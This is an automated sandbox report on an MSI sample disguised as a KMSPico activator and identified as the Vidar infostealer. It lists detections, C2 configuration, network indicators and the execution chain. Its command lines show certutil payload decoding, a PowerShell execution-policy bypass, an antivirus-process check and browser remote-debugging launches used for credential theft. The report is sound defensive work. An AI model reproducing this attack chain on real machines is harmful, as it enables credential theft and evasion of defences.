Edit tour

Windows Analysis Report
69633f.msi

Overview

General Information

Sample name:	69633f.msi
Analysis ID:	1576516
MD5:	0ad499852cac6d4d76206e52bb6efb16
SHA1:	a258c40ef83001cf7a41dbe9d2c05001f31fea53
SHA256:	1ab415530ae51853cfdd8fb1c8c0c88001d7d6cdf88ab2cb8c146c88c191dfd0
Tags:	msiuser-smica83
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for dropped file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Command shell drops VBS files

Creates an undocumented autostart registry key

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Legitimate Application Dropped Script

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Common Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 3912 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\69633f.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 1792 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7212 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D70795A19597363BCA1BA6E959046918 C MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7552 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 98F0657E4B4BD5B7A8EF6A74F6816EC8 MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSIC534.tmp (PID: 7632 cmdline: "C:\Windows\Installer\MSIC534.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" MD5: 250DA78FACCE68224B24D0FFAD65CA8E)

cmd.exe (PID: 7664 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

certutil.exe (PID: 7716 cmdline: certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1 MD5: F17616EC0522FC5633151F7CAA278CAA)

cscript.exe (PID: 7736 cmdline: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)

powershell.exe (PID: 7796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7996 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

putt.exe (PID: 3284 cmdline: "C:\Users\user~1\AppData\Local\Temp\putt.exe" MD5: C6E90B3A98ECB4AB74A9AAF8155D1BC0)

cmd.exe (PID: 7312 cmdline: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7364 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1652 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7392 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1920 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3088 cmdline: cmd /c md 615578 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 5344 cmdline: findstr /V "applied" Manually MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1156 cmdline: cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Participating.com (PID: 1252 cmdline: Participating.com w MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 4332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2356,i,6525956893070275534,18255261071347159219,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 8152 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

choice.exe (PID: 1272 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

svchost.exe (PID: 7584 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Participating.com PID: 1252	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Participating.com PID: 1252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 7716, TargetFilename: C:\Users\user~1\AppData\Local\Temp\2975.ps1

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", ProcessId: 7736, ProcessName: cscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", ProcessId: 7736, ProcessName: cscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", ProcessId: 7736, ProcessName: cscript.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Participating.com w, ParentImage: C:\Users\user\AppData\Local\Temp\615578\Participating.com, ParentProcessId: 1252, ParentProcessName: Participating.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 4332, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 7736, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1", ProcessId: 7796, ProcessName: powershell.exe

Sigma detected: Common Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: msiexec /fou {8549544C-E110-43F1-890F-41A5D528F5AA} /qb, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 1792, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{8549544C-E110-43F1-890F-41A5D528F5AA}\StubPath

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7796, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\din[1].exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\putt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\putt.exe, ParentProcessId: 3284, ParentProcessName: putt.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, ProcessId: 7312, ProcessName: cmd.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1, CommandLine: certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1, CommandLine|base64offset|contains: q, Image: C:\Windows\System32\certutil.exe, NewProcessName: C:\Windows\System32\certutil.exe, OriginalFileName: C:\Windows\System32\certutil.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: certutil -decode -f C:\Users\user~1\AppData\Local\Temp\2975.ps1 C:\Users\user~1\AppData\Local\Temp\2975.ps1, ProcessId: 7716, ProcessName: certutil.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", ProcessId: 7736, ProcessName: cscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 7736, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\2975.ps1", ProcessId: 7796, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7584, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7312, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 1920, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:21:45.896786+0100	2019714	2	Potentially Bad Traffic	192.168.2.7	49762	138.124.60.133	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:22:55.217547+0100	2044247	1	Malware Command and Control Activity Detected	116.203.12.114	443	192.168.2.7	49913	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:22:57.499659+0100	2051831	1	Malware Command and Control Activity Detected	116.203.12.114	443	192.168.2.7	49918	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:22:55.217336+0100	2049087	1	A Network Trojan was detected	192.168.2.7	49913	116.203.12.114	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://sedone.online/bQ	Avira URL Cloud: Label: malware
Source: https://sedone.online/PQ	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000020.00000003.2175069031.0000000004AFF000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\din[1].exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\putt.exe	ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 89.5% probability

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49894 version: TLS 1.2

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSIC534.tmp, 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, MSIC534.tmp, 0000000C.00000000.1445053468.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, 69633f.msi, MSIC439.tmp.7.dr, MSIC534.tmp.7.dr, 53c16a.msi.7.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: MSIC534.tmp, 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, MSIC534.tmp, 0000000C.00000000.1445053468.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmp, 69633f.msi, MSIC439.tmp.7.dr, MSIC534.tmp.7.dr, 53c16a.msi.7.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 69633f.msi, MSIFFBE.tmp.0.dr, MSIFDC5.tmp.0.dr, MSIC32D.tmp.7.dr, MSIFEB1.tmp.0.dr, MSIFFEE.tmp.0.dr, 53c16a.msi.7.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C43FC4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00007FF6D9C43FC4
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_00406301 FindFirstFileW,FindClose,	22_2_00406301
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	22_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0055DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_0055DC54
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0056A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0056A087
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0056A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0056A1E2
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0055E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	32_2_0055E472
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0056A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	32_2_0056A570
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0052C622 FindFirstFileExW,	32_2_0052C622
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_005666DC FindFirstFileW,FindNextFileW,FindClose,	32_2_005666DC
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00567333 FindFirstFileW,FindClose,	32_2_00567333
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_005673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	32_2_005673D4
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0055D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_0055D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\615578\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\615578
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 30MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49913 -> 116.203.12.114:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.7:49913
